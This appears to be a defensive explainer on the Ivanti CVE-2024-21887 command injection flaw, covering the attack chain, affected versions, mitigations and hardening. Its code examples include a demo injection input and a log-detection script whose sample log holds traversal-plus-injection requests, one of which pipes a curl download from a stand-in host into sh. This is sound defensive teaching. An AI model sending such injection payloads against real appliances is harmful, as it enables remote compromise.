Ivanti Connect Secure (ICS) and Ivanti Policy Secure contain a command injection vulnerability (CVE-2024-21887) in web components, allowing authenticated administrators to execute arbitrary commands. This is frequently chained with CVE-2023-46805 for unauthenticated access.
Frequently Asked Questions
What is CVE-2024-21887 and why does it matter?
CVE-2024-21887 is a critical command injection vulnerability (CVSS 9.1) in the web components of Ivanti Connect Secure and Ivanti Policy Secure gateways. It matters because it lets an authenticated administrator run arbitrary operating system commands on the appliance. When paired with CVE-2023-46805, an authentication bypass, it becomes unauthenticated remote code execution on an internet-facing device, posing a severe risk of total appliance compromise and network-wide intrusion.
Which versions of the Ivanti products are affected?
The vulnerability affects all supported versions of Ivanti Connect Secure and Ivanti Policy Secure in the 9.x and 22.x trains; releases such as 9.1R18, 22.6R2, and 22.6R1 are listed explicitly as affected, but being on an older or newer build in those trains does not mean an appliance is safe. Organizations should compare the version shown on each appliance against Ivanti's advisory rather than against this short list, and apply the vendor-provided mitigation immediately.
Has a patch been released for CVE-2024-21887?
As of the disclosure date, Ivanti has provided mitigations via a configuration file (mitigation.release.20240105.1.xml) to address the issue while a permanent patch is developed. Users must follow the official Ivanti forum link to download and import these mitigations. Applying these temporary fixes is critical to blocking the exploitation vectors used in active attacks.
What is the remediation deadline for CVE-2024-21887?
The remediation deadline is January 22, 2024. For federal civilian agencies covered by CISA's Binding Operational Directive 22-01, this is a mandatory date by which the mitigation must be applied or the product taken out of use. The short timeline reflects the 'Critical' severity and the evidence of active exploitation in the wild by threat actors.
How can I check if my deployment is affected by this vulnerability?
Organizations can check for exposure by verifying the appliance's product version and confirming whether the mitigation has been imported, and can check for compromise by running the latest Ivanti Integrity Checker Tool. Reviewing web access and system logs for unexpected requests to API or administrative endpoints, particularly ones containing path traversal sequences or shell metacharacters, is also recommended. Because this vulnerability was being exploited in the wild before it was disclosed, a clean ICT result is a point-in-time check rather than proof of absence, and any sign of compromise should trigger an immediate incident response process.
CVE-2024-21887 is a CRITICAL command injection vulnerability in Ivanti Connect Secure and Ivanti Policy Secure web components, carrying a CVSS score of 9.1. Due to its active exploitation in the wild and potential for ransomware deployment, organizations must apply mitigations or patches by the January 22, 2024 remediation deadline to prevent total appliance compromise.
Mitigations available; check vendor for latest updates
Technical Deep Dive: Understanding CWE-77 in Ivanti Gateways
CVE-2024-21887 is categorized under CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection'). In the context of Ivanti Connect Secure (formerly Pulse Connect Secure), this vulnerability resides within the web-based management components. Command injection occurs when an application passes unsafe, user-supplied data (such as form inputs or HTTP headers) to a system shell. Because the application fails to properly sanitize these inputs, an attacker can inject their own operating system commands, which are then executed with the privileges of the application process.
In this specific case, the flaw allows an authenticated administrator to send specially crafted requests to the appliance's web interface. The affected web component builds an operating system command from request data without neutralizing shell metacharacters, so a crafted value in the request is executed by the underlying Linux-based operating system with the web component's privileges. While the base CVE requires administrative privileges, the real-world danger is amplified by the architectural placement of these gateways. As the primary entry point for remote access into corporate networks, a compromise of the Ivanti appliance provides the attacker with a high-privilege foothold inside the DMZ or the internal network.
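To make the CWE-77 pattern concrete, the following is an added example (not Ivanti's code): a small status lookup that interpolates a caller-supplied name into a shell command, beside two hardened variants. The command (a stand-in `echo`), the parameter name and the allowlist regex are assumptions chosen for illustration; the appliance's real code path is not reproduced here.

```python
"""CWE-77 in miniature: a lookup that passes a caller-supplied value to
a shell, beside two hardened variants. Added example, not Ivanti's code;
the command, parameter name and allowlist are illustrative assumptions."""
import re
import shlex
import subprocess

# Constructed hostile input as an attacker would supply it in a request.
HOSTILE_NAME = "x; echo INJECTED"

# Hypothetical allowlist: a key name is a short token and nothing else.
KEY_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def status_vulnerable(key_name: str) -> str:
    """Vulnerable pattern: string interpolation into a shell command.
    Any ';', '|', '`' or '$(' in key_name becomes part of the command line
    and is run with the privileges of this process."""
    cmd = f"echo key={key_name}"  # 'echo' stands in for a real status binary
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def status_argv(key_name: str) -> str:
    """Hardened: argv list, no shell. Metacharacters reach the program as
    plain data and are never interpreted."""
    out = subprocess.run(["echo", f"key={key_name}"],
                         capture_output=True, text=True)
    return out.stdout


def status_validated(key_name: str) -> str:
    """Hardened, defence in depth: reject anything outside the allowlist
    before it reaches a command, and quote it if a shell is unavoidable."""
    if not KEY_NAME_RE.fullmatch(key_name):
        raise ValueError(f"invalid key name: {key_name!r}")
    cmd = f"echo key={shlex.quote(key_name)}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(status_vulnerable(HOSTILE_NAME)))
    print("argv      :", repr(status_argv(HOSTILE_NAME)))
    try:
        status_validated(HOSTILE_NAME)
    except ValueError as exc:
        print("validated : rejected ->", exc)
    print("validated :", repr(status_validated("prod-key_01")))
```

Run on a POSIX system: the vulnerable variant prints a second line, `INJECTED`, because the shell treated `;` as a command separator; the argv variant prints the hostile string literally; the validated variant refuses it outright. The fix that matters is the first one (never hand untrusted data to a shell); the allowlist and quoting are a second layer for code paths where a shell cannot be removed.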
The Blast Radius
The "blast radius" for CVE-2024-21887 is immense. Because the vulnerability allows for arbitrary command execution, an attacker can:
Establish Persistence: Install backdoors or webshells that survive reboots.
Credential Harvesting: Intercept user credentials as they authenticate to the VPN.
Lateral Movement: Use the appliance as a pivot point to scan and attack other internal systems.
Data Exfiltration: Access sensitive configuration data or user traffic passing through the gateway.
The Attack Chain: From Authenticated Admin to Arbitrary Execution
While CVE-2024-21887 is technically an "authenticated" vulnerability, it is almost exclusively discussed in tandem with CVE-2023-46805, an authentication bypass vulnerability. By chaining these two flaws together, threat actors can bypass the need for valid credentials entirely.
The Bypass: The attacker exploits CVE-2023-46805 to gain access to restricted web endpoints without logging in.
The Injection: Once access is gained, the attacker leverages CVE-2024-21887 to inject commands into the vulnerable web components.
The Execution: The appliance executes the injected commands with the privileges of the web component, giving the attacker an interactive shell on the appliance or the ability to run arbitrary scripts.
This chain effectively converts a post-authentication flaw into a pre-authentication Remote Code Execution (RCE) exploit. Security researchers have observed multiple threat actors using this specific chain to deploy webshells and facilitate further network intrusion. The high EPSS score of 0.94412 reflects the extreme likelihood that any exposed and unmitigated instance will be targeted by automated scanning tools and sophisticated APT groups.
Who Is Affected: Impacted Versions and Compliance Mandates
This vulnerability impacts a wide range of organizations globally, particularly those relying on Ivanti Connect Secure (ICS) for remote access and Ivanti Policy Secure (IPS) for network access control. The primary affected versions include:
Ivanti Connect Secure: all supported 9.x and 22.x versions, including 9.1R18 and 22.6R2.
Ivanti Policy Secure: all supported 9.x and 22.x versions, including 9.1R18 and 22.6R1.
Compliance and CISA BOD 22-01
Due to the "active exploitation" status, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Under Binding Operational Directive (BOD) 22-01, federal civilian executive branch agencies are required to remediate this vulnerability by January 22, 2024. For private sector organizations, this deadline serves as a critical benchmark for risk management. Failure to apply mitigations by this date significantly increases the risk of being targeted by ransomware campaigns, which have historically leveraged Pulse/Ivanti vulnerabilities to lock down enterprise environments.
Official Remediation Steps and Vendor Mitigations
Ivanti has released a staged remediation plan. Because a full patch for all versions was not immediately available at the time of disclosure, the vendor provided an XML-based mitigation to block the exploit vectors.
Download the Mitigation: Access the Ivanti Success Portal to obtain the mitigation.release.20240105.1.xml file.
Import the XML: Navigate to the appliance's maintenance/configuration import section and apply the mitigation file. Note that this may impact some functionality, specifically web-based management features, but it is necessary for security.
Run the Integrity Checker: Ivanti provides an external and an internal Integrity Checker Tool (ICT). Administrators should run the newest version of the tool to scan for unauthorized changes to the filesystem, which may indicate a prior compromise. A clean result is a point-in-time check, not proof that the appliance was never compromised, so repeat the scan after applying the mitigation and again after patching.
Plan Version Upgrades: Monitor the Ivanti portal for the patched release for your specific version train and schedule an immediate maintenance window once it becomes available; the XML mitigation is a stopgap and does not replace the patch.
Password Resets: If an appliance is found to be compromised, assume all credentials that passed through the device have been stolen. A full credential reset for all VPN users and administrative accounts is mandatory, and any secrets stored on the appliance (certificates and private keys, API tokens, service account passwords) should be rotated as well.
Enterprise Security Best Practices for VPN Infrastructure
To defend against CWE-77 and similar command injection flaws in the future, organizations should adopt the following defensive measures:
Egress Filtering: Restrict the VPN gateway's ability to initiate outbound connections to the internet. Post-exploitation tooling commonly needs the appliance to reach an attacker-controlled server to download second-stage payloads or beacon to Command and Control (C2); blocking unexpected egress breaks that step and makes the attempt visible in firewall logs.
Implement Geo-Blocking: If your workforce is localized to specific regions, block administrative access from IP addresses originating in countries where you do not have operations.
Principle of Least Privilege: Ensure that the administrative accounts used for managing the gateway are used only when necessary and utilize Multi-Factor Authentication (MFA). While MFA does not stop the exploit, it limits the attacker's ability to use stolen admin credentials elsewhere.
Log Centralization: Stream Ivanti system and access logs to a centralized SIEM (Security Information and Event Management) platform. Look for unusual POST requests to administrative endpoints or unusual shell activity.
Zero Trust Architecture (ZTA): Begin migrating toward a Zero Trust Network Access (ZTNA) model. ZTNA reduces reliance on a single 'front door' gateway, making it much harder for an attacker to gain broad network access through a single software vulnerability.
Regular Integrity Audits: Schedule weekly runs of the Ivanti Integrity Checker, even if no vulnerability is currently disclosed. Detecting a compromise early is the most reliable way to keep an appliance foothold from turning into a large-scale data breach or ransomware event.
Network Segmentation: Place the VPN gateway in a strictly controlled DMZ with limited access to the core internal network. Use internal firewalls to inspect traffic coming from the VPN gateway for signs of lateral movement.
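The Log Centralization point above, and the attack chain described earlier, both come down to one question for a SIEM: what does traversal into an API path followed by command injection look like in the gateway's web access log? The following added example (not Ivanti's tooling) sweeps a handful of constructed log lines for that shape. The log format, paths, addresses and timestamps are all constructed for illustration; the real exploit request is not reproduced, and the detection keys on the generic markers of the vulnerability class: a `..` traversal sequence and shell metacharacters in a request path under `/api/`.

```python
"""Sweep constructed gateway access-log lines for the traversal-plus-command-
injection shape described in the attack chain. Added example, not Ivanti's
tooling; every log line, path and address below is constructed."""
import re
from urllib.parse import unquote

# Constructed sample: two benign requests and two that show the chain's
# shape (traversal into an API path, then shell metacharacters).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jan/2024:08:01:22 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
203.0.113.7 - - [11/Jan/2024:08:02:03 +0000] "GET /api/v1/public/status/../../admin/keys-status/;id; HTTP/1.1" 200 311
203.0.113.7 - - [11/Jan/2024:08:02:09 +0000] "POST /api/v1/admin/config/;curl%20http://203.0.113.9/x%7Csh; HTTP/1.1" 200 42
10.0.0.8 - - [11/Jan/2024:08:03:44 +0000] "GET /dana-admin/misc/admin.cgi?x=1 HTTP/1.1" 302 0
"""

# Common-log-style line: source, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters a shell treats as separators or substitution.
SHELL_META = re.compile(r"[;|`&]|\$\(")


def decode_target(target: str) -> str:
    """Percent-decode up to twice so double-encoded payloads are inspected
    as the server would ultimately see them."""
    for _ in range(2):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def inspect_request(target: str) -> list:
    """Return the reasons a request target looks like traversal plus
    command injection; an empty list means nothing suspicious."""
    path = decode_target(target).split("?", 1)[0]
    reasons = []
    if "/../" in path or path.endswith("/.."):
        reasons.append("path traversal in request path")
    if path.startswith("/api/") and SHELL_META.search(path):
        reasons.append("shell metacharacters in API path")
    return reasons


def sweep(log_text: str) -> list:
    """Parse each line and collect findings with line number, source,
    HTTP status (a 200 on a traversal request suggests the bypass worked)
    and the reasons it was flagged."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reasons = inspect_request(m["target"])
        if reasons:
            findings.append({
                "line": lineno, "src": m["src"], "status": m["status"],
                "target": m["target"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in sweep(SAMPLE_LOG):
        print(f"line {f['line']} from {f['src']} status {f['status']}: "
              f"{', '.join(f['reasons'])}")
```

On the sample, lines 2 and 3 are flagged (line 2 for both traversal and metacharacters, line 3 for metacharacters only) and the benign `/dana-na/` and `/dana-admin/` requests are not. Decoding twice matters because a single `unquote` would leave a `%252F` sequence looking harmless; in production, feed the same logic the SIEM's parsed URL field and add the source-address and status-code context to the alert.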